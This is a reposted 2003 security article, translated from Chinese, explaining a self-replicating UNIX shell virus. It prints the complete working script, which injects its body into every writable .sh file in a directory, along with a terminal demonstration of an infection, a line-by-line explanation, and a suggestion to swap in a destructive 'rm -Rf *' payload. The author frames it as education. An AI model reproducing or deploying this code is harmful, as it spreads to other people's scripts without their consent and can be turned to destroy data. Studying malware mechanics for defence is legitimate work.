A Brief Introduction to UNIX SHELL Virus
来源:互联网 发布:全国省市区json数据 编辑:程序博客网 时间:2024/04/18 15:12
Create: 2003-06-09Author: watercloud (watercloud_at_xfocus.org)A Brief Introduction to UNIX SHELL Virus1. Preface Speaking of virus it has always been somewhat mysterious. I remember whenI compiled my first dos virus in assembling it was such a painful task. Fromthe initial assumption to the final accomplishment it took me more than 3months, but what I had compiled was still at mess. Recently I come up with the idea that virus ultimately is something that affects other files and spreads itself, so it would not be too complicated to compile a virus by shell. Then I conveniently compiled the following script. Its functionalityis to affect other shell programs. This program is of little practical significance, but it is helpful to visually understand the virus spread mechanism. Therefore, its instructive significance is more important than the practical one. 2. Program Code#!/bin/sh#file name: virus_demo.sh#purpose: shell virus demonstration#note: the virus will affect all the files that end with .sh in the current directory, but it will not affect them repeatedly. #compiler: watercloud@xfocus.org#date: 2003-5-13#B:<+!a%C&t:>vFile=$_ ; vTmp=/tmp/.vTmp.$$for f in ./*.sh; do if [ ! -w $f -a ! -r $vFile ]; then continue; fi if grep '<+!a%C&t:>' $f ; then continue; fi if sed -n '1p' $f | grep 'csh'; then continue; fi cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi vNo=`awk '$0~/(^/b*#)|(^/b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp` sed -n "1,${vNo}p" $vTmp >$f (sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f vNo=`expr $vNo + 1` sed -n "${vNo},/$p" $vTmp >>$f rm -f $vTmpdone >/dev/null 2>&1unset vTmp ;unset vFile ;unset vNoecho "Hi, here is a demo shell virus in your script !"#E:<+!a%C&t:>#EOF This program is of little practical significance, but it is helpful to visually understand the virus spread mechanism. Therefore, its instructive significance is more important than the practical one. 3. DemonstrationTest:First put 2 files in the current directory. One is virus file, and anotheris for affect test. [cloud@ /export/home/cloud/vir]> ls -ldrwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../-rwxr--r-- 1 cloud staff 89 6?? 4 17:43 test.sh-rwxr--r-- 1 cloud staff 773 6?? 4 17:42 virus_demo.shLet's have a look at the victim script. It is very simple:[cloud@ /export/home/cloud/vir]> cat test.sh#!/bin/sh# Just a demo for virus test# Author : foo# Date : 3000-1-1ls -l#EOFBegin to affect. [cloud@ /export/home/cloud/vir]> ./virus_demo.shHi, here is a demo shell virus in your script !The result after affect:[cloud@ /export/home/cloud/vir]> cat test.sh#!/bin/sh# Just a demo for virus test# Author : foo# Date : 3000-1-1#B:<+!a%C&t:>vFile=$_ ; vTmp=/tmp/.vTmp.$$for f in ./*.sh; do if [ ! -w $f -a ! -r $vFile ]; then continue; fi if grep '<+!a%C&t:>' $f ; then continue; fi if sed -n '1p' $f | grep 'csh'; then continue; fi cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi vNo=`awk '$0~/(^/b*#)|(^/b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp` sed -n "1,${vNo}p" $vTmp >$f (sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f vNo=`expr $vNo + 1` sed -n "${vNo},/$p" $vTmp >>$f rm -f $vTmpdone >/dev/null 2>&1unset vTmp ;unset vFile ;unset vNoecho "Hi, here is a demo shell virus in your script !"#E:<+!a%C&t:>ls -l#EOFThe virus body:#B:<+!a%C&t:>. . . . #E:<+!a%C&t:>is copied, thus the virus is spreaded. Please note that the position where the virus body is injected is the beginningof the source test.sh's effective program line. This results from the fact that most shell program experts prefer to make notes at the beginning of theprogram. You are not expected to put others' note information to the end, or it would be too obvious. Execute the new virus body:[cloud@ /export/home/cloud/vir]> ./test.shHi, here is a demo shell virus in your script ! Printing information in the virus body.-rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh-rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh4. Brief ExplanationLet's analyze the virus step by step:#B:<+!a%C&t:> The virus body begins to tag, thus the program can locate itself during thecopying.vFile=$_ ; vTmp=/tmp/.vTmp.$$Defining 2 variables. One is temporary file, another records the current file-name $_. Therefore it's required this line should be the first line in the effective line of the program, otherwise it's impossible to acquire the nameof the current program, and subsequently it's impossible to find the virusbody for copying. for f in ./*.sh; doBegin to circle, and find out all the programs that end with .sh in the current directory. if [ ! -w $f -a ! -r $vFile ]; then continue; fi If the target has write privilege and if the virus source file has read privilege. if grep '<+!a%C&t:>' $f ; then continue; fi If the target has been irreversibly affected. If so it would be immoral to affect it again. if sed -n '1p' $f | grep 'csh'; then continue; fi If the target shell is in csh, they are too different in grammar. Give up. cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi Get ready to affect. First copy a backup for the target. What if the copying fails? Of course have no choice but give up. vNo=`awk '$0~/(^/b*#)|(^/b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp` It seems to be complicated, but for shell virus learners they are expected to know awk and the formal expression. This is the one used to find how many comment lines and blank line in the program beginning, so as to determine virus body's inject position. sed -n "1,${vNo}p" $vTmp >$f A sed command copy the beginning comment section of the target file back from the backup file. (sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f One more sed to finish virus body transportation. vNo=`expr $vNo + 1` sed -n "${vNo},/$p" $vTmp >>$f The last sed moves other sections of the target file back. sed is powerful!! rm -f $vTmp Clean up temporary files. done >/dev/null 2>&1Circle is over.unset vTmp ;unset vFile ;unset vNoClean up crime scene. echo "Hi, here is a demo shell virus in your script !"Since the file has been affected, show some indication to tell this is an affected one. #E:<+!a%C&t:>The virus body stops tagging, so that the program copying locates itself.5. PS From it we can see the script virus is very simple. It can be compile withoutmuch knowledge. And its destructive ability should never be overlooked. Forexample, if we change the echo information in the program into rm -Rf * .On the other hand it shows how powerful the shell is. Just imagine how much effort it takes for a traditional program to handle PE file structure and ELF structure. The above program has been tested on Linux and Solaris. It should also beappliable for windows users on Cygwin. By the way, the purpose of this article is to share virus understandings with others, not to teach how to compile virus and victimize others. Pleasekeep it in mind. #EOF#GAME OVERecho "COMMENTS ARE WELCOME!" Copyright © 1998-2003 XFOCUS Team. All Rights Reserved
- A Brief Introduction to UNIX SHELL Virus
- A Brief Introduction to IoC
- A Brief Introduction to IoC
- A Brief Introduction to REST
- A Brief Introduction to REST
- A Brief Introduction to OVF
- A Brief Introduction to Myself
- A brief introduction to VXLAN
- A Brief Introduction to XACML
- A brief introduction to geospatial coordinates
- A Brief Introduction to Multiset[STL]
- A Brief Introduction to Language Modeling
- A Brief Introduction to PHP Namespacing
- A brief introduction to feature selection
- A Brief Introduction to Digital Video
- IoC 简介:A Brief Introduction to IoC[读后感]
- A Brief Introduction to the JTAG Boundary Scan Interface
- A Brief Introduction to the JCo Server - Austin Sincock
- 针对这一段时间ASP.NET版中比较集中突出的问题,我写了一个完整的页面,包含显示/修改/删除/添加/排序/合并/写文件/显示图片或文档,有详细代码注释
- [翻译]J2EE项目危机
- 安装了RH9,贴几张图片看看
- 用煤气管道也能上网 速度比光纤接入快一倍
- Google真能颠覆传统新闻模式?
- A Brief Introduction to UNIX SHELL Virus
- Google披露成功的技术秘诀: 购买廉价计算机
- ORACLE SEQUENCE的介绍
- 李开复寄语中国软件业
- [DNN学习所得]显示网站图标
- DNN的数据访问方式——合理运用模式,提高数据访问的灵活性
- [DNN学习所得]HttpModule到底是个什么东西
- JCreator 使用技巧-2
- 初识DotNetNuke(DNN)